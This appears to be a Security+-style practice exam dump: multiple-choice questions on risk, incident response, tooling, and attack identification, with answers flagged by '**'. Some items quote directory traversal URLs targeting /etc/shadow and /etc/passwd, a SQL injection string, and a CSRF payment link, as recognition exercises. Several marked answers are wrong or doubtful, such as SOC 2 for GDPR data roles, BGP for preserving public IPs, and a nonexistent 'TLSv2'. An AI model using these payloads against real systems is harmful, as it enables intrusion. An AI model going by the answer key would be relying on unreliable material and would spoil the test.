A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

A. a rootkit. B. a PUP.** (Potentially Unwanted Program) C. a backdoor. D. ransomware. E. a RAT.

While investigating a recent security incident, a security analyst decides to view all network connections on a particular server. Which of the following would provide the desired information?

A. arp B. nslookup C. netstat** D. nmap

An organization has decided to purchase an insurance policy because a risk assessment determined that the cost to remediate the risk is greater than the five- year cost of the insurance policy. The organization is enabling risk:

A. avoidance. B. acceptance. C. mitigation. D. transference. D

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a __________.

A. data controller. B. data owner. C. data custodian.** D. data processor.

During an incident response process involving a laptop, a host was identified as the entry point for malware. The management team would like to have the laptop restored and given back to the user. The cybersecurity analyst would like to continue investigating the intrusion on the host. Which of the following would allow the analyst to continue the investigation and also return the laptop to the user as soon as possible?

A. dd** B. memdump C. tcpdump D. head

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to implement a high availability pair to:

A. decrease the mean time between failures. B. remove the single point of failure.** C. cut down the mean time to repair. D. reduce the recovery time objective.

A company labeled some documents with the public sensitivity classification. This means the documents can be accessed by:

A. employees of other companies and the press.** B. all members of the department that created the documents. C. only the company's employees and those listed in the document. D. only the individuals listed in the documents.

The concept of connecting a user account across the systems of multiple enterprises is BEST known as:

A. federation.** B. a remote access policy. C. multifactor authentication. D. single sign-on.

An organization is concerned that its hosted web servers are not running the most updated version of the software. Which of the following would work BEST to help identify potential vulnerabilities?

A. hping3 -S comptia-org -p 80 B. nc -l -v comptia.org -p 80 C. nmap comptia.org -p 80 -sV** (service Version) D. nslookup -port=80 comptia.org

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?

A. http://sample.url.com/ B. http://sample.url.com/someotherpageonsite/../../../etc/shadow ** (../../../../ is directory traversal) C. http://sample.url.com/select-from-database-where-password-null D. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

A systems administrator is troubleshooting a server's connection to an internal web server. The administrator needs to determine the correct ports to use. Which of the following tools BEST shows which ports on the web server are in a listening state?

A. ipconfig B. ssh C. ping D. netstat**

A forensics investigator is examining a number of unauthorized payments that were reported on the company's website. Some unusual log entries show users received an email for an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to the phishing team, and the forwarded email revealed the link to be:<a href="https://www.company.com/payto.do?routing=00001111&acct=22223334&amount=250">Click here to unsubscribe</a>Which of the following will the forensics investigator MOST likely determine has occurred?

A. SQL injection B. Broken authentication C. XSS (Cross Site Scripting) D. XSRF (Cross Site Request Forgery) D

A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst to use?

A. SSAE SOC 2 B. ISO 31000** C. NIST CSF D. GDPR

Which of the following is MOST likely to outline the roles and responsibilities of data controllers and data processors?

A. SSAE SOC 2** B. PCI DSS C. GDPR* (could be this too) D. ISO 31000

After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across the network to access network devices over port 23. Which of the following should be implemented so all credentials sent over the network are encrypted when remotely accessing and configuring network devices?

A. SSH** (port 22) B. SNMPv3 C. SFTP D. Telnet (port 23) E. FTP

A company wants to build a new website to sell products online. The website will host a storefront application that will allow visitors to add products to a shopping cart and pay for the products using a credit card. Which of the following protocols would be the MOST secure to implement?

A. SSL B. SFTP C. SNMP D. TLS** (Transport Layer Security)

A security engineer was assigned to implement a solution to prevent attackers from gaining access by pretending to be authorized users. Which of the following technologies meets the requirement?

A. SSO B. IDS C. MFA** D. TPM

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

A. SSO** B. MFA C. PKI D. DLP

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has 100 databases that are on premises. Which of the following solutions will require the LEAST management and support from the company?

A. SaaS** B. IaaS C. PaaS D. SDN

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?

A. SaaS** B. IaaS C. PaaS D. SDN

During a security assessment, a security analyst finds a file with overly permissive permissions. Which of the following tools will allow the analyst to reduce the permissions for the existing users and groups and remove the set-user-ID bit from the file?

A. ls B. chflags C. chmod** (change mode linux) D. lsof E. setuid

A website developer is working on a new e-commerce website and has asked an information security expert for the most appropriate way to store credit card numbers to create an easy reordering process. Which of the following methods would BEST accomplish this goal?

A. Salting the magnetic strip information B. Encrypting the credit card information in transit C. Hashing the credit card numbers upon entry D. Tokenizing the credit cards in the database**

A malicious actor recently penetrated a company's network and moved laterally to the data center. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

A. Security B. Application C. Dump** D. Syslog

Which of the following is an administrative control that would be MOST effective to reduce the occurrence of malware execution?

A. Security awareness training** B. Frequency of NIDS updates C. Change control procedures D. EDR reporting cycle

A security analyst wants to fingerprint a web server. Which of the following tools will the security analyst MOST likely use to accomplish this task?

A. nmap -pl-65535 192.168.0.10 B. dig 192.168.0.10 C. curl --head http://192.168.0.10 ** D. ping 192.168.0.10

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

A. nmap** B. tracert C. ping D. ssh

A security manager has tasked the security operations center with locating all web servers that respond to an unsecure protocol. Which of the following commands could an analyst run to find the requested servers?

A. nslookup 10.10.10.0 B. nmap -p 80 10.10.10.0/24 C. pathping 10.10.10.0 -p 80 D. ne -l -p 80 B

After gaining access to a dual-homed (i.e., wired and wireless) multifunction device by exploiting a vulnerability in the device's firmware, a penetration tester then gains shell access on another networked asset. This technique is an example of:

A. privilege escalation. B. footprinting. C. persistence. D. pivoting.**

Digital signatures use asymmetric encryption. This means the message is encrypted with:

A. the sender's private key and decrypted with the sender's public key.** B. the sender's public key and decrypted with the sender's private key. C. the sender's private key and decrypted with the recipient's public key. D. the sender's public key and decrypted with the recipient's private key.

A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

A. Security patches failed to install due to a version incompatibility. B. An adversary altered the vulnerability scan reports. C. A zero-day vulnerability was used to exploit the web server. D. The scan reported a false negative for the vulnerability.**

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

A. Security patches were uninstalled due to user impact.** B. An adversary altered the vulnerability scan reports C. A zero-day vulnerability was used to exploit the web server D. The scan reported a false negative for the vulnerability

A security analyst has been reading about a newly discovered cyberattack from a known threat actor. Which of the following would BEST support the analyst's review of the tactics, techniques, and protocols the threat actor was observed using in previous campaigns?

A. Security research publications B. The MITRE ATT&CK framework** C. The Diamond Model of Intrusion Analysis D. The Cyber Kill Chain

A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

A. Segmentation** B. Firewall allow list C. Containment D. Isolation

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?

A. Semi-authorized hackers B. State actors** (Hacktivists) C. Script kiddies D. Advanced persistent threats

A database administrator wants to grant access to an application that will be reading and writing data to a database. The database is shared by other applications also used by the finance department. Which of the following account types is MOST appropriate for this purpose?

A. Service** B. Shared C. Generic D. Admin

Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?

A. Set up hashing on the source log file servers that complies with local regulatory requirements.** (Integrity=Hashing) B. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements. C. Write protect the aggregated log files and move them to an isolated server with limited access. D. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was not working. Which of the following is the MOST likely threat actor?

A. Shadow IT B. Script kiddies C. APT** (Advanced Persistent Threat) D. Insider threat

A company wants to simplify the certificate management process. The company has a single domain with several dozen subdomains, all of which are publicly accessible on the internet. Which of the following BEST describes the type of certificate the company should implement?

A. Subject alternative name B. Wildcard C. Self-signed D. Domain validation B

After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. Which of the following BEST describes the incident?

A. Supply chain attack** B. Ransomware attack C. Cryptographic attack D. Password attack

A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?

A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.** (Lessons Learned) B. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed. C. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point. D. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

Which of the following explains why RTO is included in a BIA?

A. It identifies the amount of allowable downtime for an application or system.** (Recovery Time Objective, Business Impact Analysis) B. It prioritizes risks so the organization can allocate resources appropriately. C. It monetizes the loss of an asset and determines a break-even point for risk mitigation. D. It informs the backup approach so that the organization can recover data to a known time.

Which of the following prevents an employee from seeing a colleague who is visiting an inappropriate website?

A. Job rotation policy B. NDA C. AUP** D. Separation of duties policy

A security analyst needs to centrally manage credentials and permissions to the company's network devices. The following security requirements must be met: • All actions performed by the network staff must be logged. • Per-command permissions must be possible. • The authentication server and the devices must communicate through TCP. Which of the following authentication protocols should the analyst choose?

A. Kerberos B. CHAP C. TACACS+** (Terminal Access Controller Access Control System Plus) D. RADIUS

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following BEST describes this type of vulnerability?

A. Legacy operating system B. Weak configuration C. Zero day** D. Supply chain

A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not deleted. Which of the following should the company implement to assist in the investigation?

A. Legal hold** B. Chain of custody C. Data loss prevention D. Content filter

An organization is tuning SIEM rules based off of threat intelligence reports. Which of the following phases of the incident response process does this scenario represent?

A. Lessons learned B. Eradication C. Recovery D. Preparation**

The Chief Information Security Officer (CISO) requested a report on potential areas of improvement following a security incident. Which of the following incident response processes is the CISO requesting?

A. Lessons learned** B. Preparation C. Detection D. Containment E. Root cause analysis

The IT department's on-site developer has been with the team for many years. Each time an application is released, the security team is able to identify multiple vulnerabilities. Which of the following would BEST help the team ensure the application is ready to be released to production?

A. Limit the use of third-party libraries. B. Prevent data exposure queries. C. Obfuscate the source code. D. Submit the application to QA before releasing it.**

A user is attempting to navigate to a website from inside the company network using a desktop. When the user types in the URL, https://www.site.com, the user is presented with a certificate mismatch warning from the browser. The user does not receive a warning when visiting http://www.anothersite.com. Which of the following describes this attack?

A. On-path B. Domain hijacking C. DNS POISONING D. Evil twin C

A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While using airodump-ng, the administrator notices other access points are running with the same corporate ESSID on all available channels and with the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?

A. On-path B. Evil twin** C. Jamming D. Rogue access point E. Disassociation

An analyst receives multiple alerts for beaconing activity for a host on the network. After analyzing the activity, the analyst observes the following activity: *A user enters comptia.org into a web browser. *The website that appears is not the comptia.org site. *The website is a malicious site from the attacker. *Users in a different office are not having this issue. Which of the following types of attacks was observed?

A. On-path attack B. DNS poisoning** C. Locator (URL) redirection D. Domain hijacking

An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping site. Later, the user received an email regarding the credit card statement with unusual purchases. Which of the following attacks took place?

A. On-path attack** B. Protocol poisoning C. Domain hijacking D. Bluejacking

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?

A. One-time passwords B. Email tokens C. Push notifications** D. Hardware authentication

Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left unsecured. Which of the following types of data does this combination BEST represent?

A. Personal health information** B. Personally identifiable information C. Tokenized data D. Proprietary data

Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset link. Which of the following attacks is being used to target the company?

A. Phishing B. Vishing C. Smishing** D. Spam

Which of the following types of controls is a turnstile?

A. Physical** B. Detective C. Corrective D. Technical

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

A. # iptables -t mangle -X B. # iptables -F** (Flush) C. # iptables -Z D. # iptables -P INPUT -j DROP

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

A. .pfx B. .csr C. .pvk D. .cer**

Which of the following scenarios BEST describes a risk reduction technique?

A. A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches. B. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure method of operation.** C. A security control objective cannot be met through a technical change, so the company performs regular audits to determine if violations have occurred. D. A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

Which of the following would BEST provide detective and corrective controls for thermal regulation?

A. A smoke detector B. A fire alarm C. An HVAC system** D. A fire suppression system E. Guards

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker MOST likely attempting?

A. A spear-phishing attack B. A watering-hole attack** C. Typo squatting D. A phishing attack

An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced due to loss, damage, or theft steadily increased by 10%. Which of the following would BEST describe the estimated number of devices to be replaced next year?

A. ALE (Annual loss expectancy) B. ARO** (Annualized Rate of Occurence) C. RPO (Recovery point objective) D. SLE (Single loss expectancy)

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of the following is this an example of?

A. AUP** (Acceptable Use Policy) B. NDA C. SLA D. MOU

A recent audit cited a risk involving numerous low-criticality vulnerabilities created by a web application using a third-party library. The development staff state there are still customers using the application even though it is end of life and it would be a substantial burden to update the application for compatibility with more secure libraries. Which of the following would be the MOST prudent course of action?

A. Accept the risk if there is a clear road map for timely decommission.** B. Deny the risk due to the end-of-life status of the application. C. Use containerization to segment the application from other applications to eliminate the risk. D. Outsource the application to a third-party developer group.

Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational purposes?

A. Acceptance** B. Transference C. Avoidance D. Mitigation

Which of the following controls would provide the BEST protection against tailgating?

A. Access control vestibule** B. Closed-circuit television C. Proximity card reader D. Faraday cage

The compliance team requires an annual recertification of privileged and non-privileged user access. However, multiple users who left the company six months ago still have access. Which of the following would have prevented this compliance violation?

A. Account audits** B. AUP C. Password reuse D. SSO

Which of the following in the incident response process is the BEST approach to improve the speed of the identification phase?

A. Activate verbose logging in all critical assets. B. Tune monitoring in order to reduce false positive rates.** C. Redirect all events to multiple syslog servers. D. Increase the number of sensors present on the environment.

A company has a flat network that is deployed in the cloud. Security policy states that all production and development servers must be segmented. Which of the following should be used to design the network to meet the security requirements?

A. CASB B. VPC** (virtual private cloud) C. Perimeter network D. WAF

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

A. Adding a new UPS dedicated to the rack B. Installing a managed PDU** (Power Distribution Unit) C. Using only a dual power supplies unit D. Increasing power generator capacity

A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform?

A. Adjust the data flow from authentication sources to the SIEM. B. Disable email alerting and review the SIEM directly. C. Adjust the sensitivity levels of the SIEM correlation engine. D. Utilize behavioral analysis to enable the SIEM's learning mode.**

Which of the following will provide the BEST physical security countermeasures to stop intruders? (Choose two.)

A. Alarms B. Signage C. Lighting D. Access control vestibules** E. Fencing** F. Sensors

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would BEST support the new office?

A. Always-on B. Remote access C. Site-to-site** D. Full tunnel

Which of the following is MOST likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have been implemented?

A. An RTO report B. A risk register** C. A business impact analysis D. An asset value register E. A disaster recovery plan

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations. Which of the following documents did Ann receive?

A. An annual privacy notice** B. A non-disclosure agreement C. A privileged-user agreement D. A memorandum of understanding

A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them. Which of the following is the MOST likely cause of this issue?

A. An external access point is engaging in an evil-twin attack.** B. The signal on the WAP needs to be increased in that section of the building. C. The certificates have expired on the devices and need to be reinstalled. D. The users in that section of the building are on a VLAN that is being blocked by the firewall

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO MOST likely use?

A. An external security assessment B. A bug bounty program C. A tabletop exercise** D. A red-team engagement

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization's executives determine their next course of action?

A. An incident response plan B. A communication plan C. A disaster recovery plan D. A business continuity plan**

An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the MOST likely reason for this type of assessment?

A. An international expansion project is currently underway. B. Outside consultants utilize this tool to measure security maturity. C. The organization is expecting to process credit card information.** D. A government regulator has requested this audit to be completed.

DDoS attacks are causing an overload on the cluster of cloud servers. A security architect is researching alternatives to make the cloud environment respond to load fluctuation in a cost-effective way. Which of the following options BEST fulfills the architect's requirements?

A. An orchestration solution that can adjust scalability of cloud assets** B. Use of multipath by adding more connections to cloud storage C. Cloud assets replicated on geographically distributed regions D. An on-site backup that is displayed and only used when the load increases

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

A. Default system configuration B. Unsecure protocols C. Lack of vendor support** D. Weak encryption

An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should be disabled.Which of the following can be used to accomplish this task?

A. Application allow list B. SWG (Secure Web Gateway) C. Host-based firewall (Could be C?) D. VPN B

Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?

A. Asset management policy B. Separation of duties policy C. Acceptable use policy D. Job rotation policy**

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments? Select 1

A. Authentication protocol B. Encryption type C. WAP placement** D. VPN configuration

A Chief Executive Officer's (CEO) personal information was stolen in a social-engineering attack. Which of the following sources would reveal if the CEO's personal information is for sale?

A. Automated information sharing B. Open-source intelligence C. The dark web** D. Vulnerability databases

A penetration tester was able to compromise an internal server and is now trying to pivot the current session in a network lateral movement. Which of the following tools, if available on the server, will provide the MOST useful information for the next assessment step?

A. Autopsy B. Cuckoo C. Memdump D. Nmap**

A security analyst generated a file named host1.pcap and shared it with a team member who is going to use it for further incident analysis. Which of the following tools will the other team member MOST likely use to open this file?

A. Autopsy B. Memdump C. FTK imager D. Wireshark**

A security analyst has been asked by the Chief Information Security Officer to:✑ develop a secure method of providing centralized management of infrastructure✑ reduce the need to constantly replace aging end user machines✑ provide a consistent user desktop experience. Which of the following BEST meets these requirements?

A. BYOD B. Mobile device management C. VDI** (Virtual Desktop Infrastructure) D. Containerization

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to?

A. Backdoor B. Brute-force** C. Rootkit D. Trojan

During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site requests are reverting to HTTP. Which of the following BEST describes what is happening?

A. Birthday collision on the certificate key B. DNS hijacking to reroute traffic C. Brute force to the access point D. A SSL/TLS downgrade** (HTTPS to HTTP)

A company is working on mobile device security after a report revealed that users granted non-verified software access to corporate data. Which of the following is the MOST effective security control to mitigate this risk?

A. Block access to application stores** B. Implement OTA updates C. Update the BYOD policy D. Deploy a uniform firmware

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:✑ All users share workstations throughout the day.✑ Endpoint protection was disabled on several workstations throughout the network.✑ Travel times on logins from the affected users are impossible.✑ Sensitive data is being uploaded to external sites. All user account passwords were forced to be reset and the issue continued. Which of the following attacks is being used to compromise the user accounts?

A. Brute-force B. Keylogger** C. Dictionary D. Rainbow

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

A. Bug bounty B. Black-box (no info) C. Gray-box** (some info) D. White-box (full info)

A security analyst is hardening a network infrastructure. The analyst is given the following requirements: • Preserve the use of public IP addresses assigned to equipment on the core router. • Enable "in transport" encryption protection to the web server with the strongest ciphers. Which of the following should the analyst implement to meet these requirements? (Choose two.)

A. Configure VLANs on the core router. B. Configure NAT on the core router. C. Configure BGP on the core router**. D. Enable AES encryption on the web server. E. Enable 3DES encryption on the web server. F. Enable TLSv2 encryption on the web server.**

The SOC for a large MSSP is meeting to discuss the lessons learned from a recent incident that took much too long to resolve. This type of incident has become more common in recent weeks and is consuming large amounts of the analysts' time due to manual tasks being performed. Which of the following solutions should the SOC consider to BEST improve its response time?

A. Configure a NIDS appliance using a Switched Port Analyzer. B. Collect OSINT and catalog the artifacts in a central repository. C. Implement a SOAR with customizable playbooks.** D. Install a SIEM with community-driven threat intelligence.

A user forwarded a suspicious email to the security team. Upon investigation, a malicious URL was discovered. Which of the following should be done FIRST to prevent other users from accessing the malicious URL?

A. Configure the web content filter for the web address.** B. Report the website to threat intelligence partners. C. Set the SIEM to alert for any activity to the web address. D. Send out a corporate communication to warn all users of the malicious email.

A well-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and emailed into the company or installed on USB sticks that are dropped in parking lots. Which of the following is the BEST defense against this scenario?

A. Configuring signature-based antivirus to update every 30 minutes B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion C. Implementing application execution in a sandbox for unknown software** D. Fuzzing new files for vulnerabilities if they are not digitally signed

A security proposal was set up to track requests for remote access by creating a baseline of the users' common sign-in properties. When a baseline deviation is detected, an MFA challenge will be triggered. Which of the following should be configured in order to deploy the proposal?

A. Context-aware authentication** B. Simultaneous authentication of equals C. Extensive authentication protocol D. Agentless network access control

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

A. Continuous monitoring B. Continuous deployment C. Continuous validation D. Continuous integration** (automation)

A security analyst discovers that a company's username and password database was posted on an Internet forum. The usernames and passwords are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

A. Create DLP controls that prevent documents from leaving the network. B. Implement salting and hashing.** C. Configure the web content filter to block access to the forum. D. Increase password complexity requirements.

A company is receiving emails with links to phishing sites that look very similar to the company's own website address and content. Which of the following is theBEST way for the company to mitigate this attack?

A. Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing. B. Generate a list of domains similar to the company's own and implement a DNS sinkhole for each.** C. Disable POP and IMAP on all Internet-facing email servers and implement SMTPS. D. Use an automated tool to flood the phishing websites with fake usernames and passwords.

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results: • The exception process and policy have been correctly followed by the majority of users. • A small number of users did not create tickets for the requests but were granted access. • All access had been approved by supervisors. • Valid requests for the access sporadically occurred across multiple departments. • Access, in most cases, had not been removed when it was no longer needed. Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

A. Create an automated, monthly attestation process that removes access if an employee's supervisor denies the approval. B. Remove access for all employees and only allow new access to be granted if the employee's supervisor approves the request. C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.** D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

A network administrator has been alerted that web pages are experiencing long load times. After determining it is not a routing or DNS issue, the administrator logs in to the router, runs a command, and receives the following output: CPU 0 percent busy, from 300 sec ago 1 sec ave: 99 percent busy 5 sec ave: 97 percent busy 1 min ave: 83 percent busy Which of the following is the router experiencing?

A. DDoS attack B. Memory leak C. Buffer overflow D. Resource exhaustion**

A security analyst is reviewing application logs to determine the source of a breach and locates the following log: https://www.comptia.com/login.php?id='%20or%20'1'1='1Which of the following has been observed?

A. DLL Injection B. API attack C. SQL Injection D. XSS C

A systems administrator reports degraded performance on a virtual server. The administrator increases the virtual memory allocation, which improves conditions, but performance degrades again after a few days. The administrator runs an analysis tool and sees the following output:==3214== timeAttend.exe analyzed==3214== ERROR SUMMARY:==3214== malloc/free: in use at exit: 4608 bytes in 18 blocks.==3214== checked 82116 bytes==3214== definitely lost: 4608 bytes in 18 blocks.The administrator terminates the timeAttend.exe, observes system performance over the next few days, and notices that the system performance does not degrade. Which of the following issues is MOST likely occurring?

A. DLL injection B. API attack C. Buffer overflow D. Memory leak**

Which of the following is an effective tool to stop or prevent the exfiltration of data from a network?

A. DLP B. NIDS C. TPM D. FDE A

The Chief Information Security Officer wants to prevent exfiltration of sensitive information from employee cell phones when using public USB power charging stations. Which of the following would be the BEST solution to implement?

A. DLP B. USB data blocker** C. USB OTG D. Disabling USB ports

An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up message reveals that a payment card number was found in the file, and the file upload was blocked. Which of the following controls is most likely causing this issue and should be checked FIRST?

A. DLP** B. Firewall rule C. Content filter D. MDM E. Application allow list

A user reports falling for a phishing email to an analyst. Which of the following system logs would the analyst check FIRST?

A. DNS B. Message gateway** C. Network D. Authentication

A security analyst is receiving numerous alerts reporting that the response time of an internet-facing application has been degraded. However, the internal network performance was not degraded. Which of the following MOST likely explains this behavior?

A. DNS poisoning B. MAC flooding C. DDoS attack** (Distributed Denial of Service) D. ARP poisoning

A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the following solutions should be implemented?

A. DNSSEC** (Domain Name System Security Extensions) B. LDAPS C. NGFW D. DLP

An audit identified PII being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) is adamant that this data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for specific data. Which of the following should a security professional implement to BEST satisfy both the CPO's and the development team's requirements?

A. Data anonymization B. Data encryption C. Data masking D. Data tokenization A

Which of the following is a known security risk associated with data archives that contain financial information?

A. Data can become a liability if archived longer than required by regulatory guidance.** B. Data must be archived off-site to avoid breaches and meet business requirements. C. Companies are prohibited from providing archived data to e-discovery requests. D. Unencrypted archives should be preserved as long as possible and encrypted.

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

A. Data custodian B. Data controller** C. Data protection officer D. Data processor

A technician enables full disk encryption on a laptop that will be taken on a business trip. Which of the following does this process BEST protect?

A. Data in transit B. Data in processing C. Data at rest** D. Data tokenization

A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming?

A. Data owner** B. Data processor C. Data steward D. Data collector

An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer B. Data owner C. Backup administrator D. Data custodian** E. Internal auditor

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works BEST until a proper fix is released?

A. Detective B. Compensating** C. Deterrent D. Corrective

Which of the following control types fixes a previously identified issue and mitigates a risk?

A. Detective B. Corrective** C. Preventative D. Finalized

An organization is repairing the damage after an incident. Which of the following controls is being implemented?

A. Detective B. Preventive C. Corrective** D. Compensating

A company's security team received notice of a critical vulnerability affecting a high-profile device within the web infrastructure. The vendor patch was just made available online but has not yet been regression tested in development environments. In the interim, firewall rules were implemented to reduce the access to the interface affected by the vulnerability. Which of the following controls does this scenario describe?

A. Deterrent B. Compensating** C. Detective D. Preventive

An organization maintains several environments in which patches are developed and tested before being deployed to an operational status. Which of the following is the environment in which patches will be deployed just prior to being put into an operational status?

A. Development B. Test C. Production D. Staging**

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The caller asks the technician to verify the network's internal firewall IP Address. Which of the following is the technician's BEST course of action?

A. Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller. B. Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone. C. Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer.** D. Request the caller send an email for identity verification and provide the requested information via email to the caller.

A company wants to improve end users' experiences when they log in to a trusted partner website. The company does not want the users to be issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own credentials to log in to the trusted partner's website?

A. Directory service B. AAA server C. Federation** (SSO) D. Multifactor authentication

A security analyst is reviewing web-application logs and finds the following log: https://www.comptia.org/contact-us/%3Ffile%3D..%2F..%2Fetc%2Fpasswd Which of the following attacks is being observed?

A. Directory traversal** B. XSS C. CSRF D. On-path attack

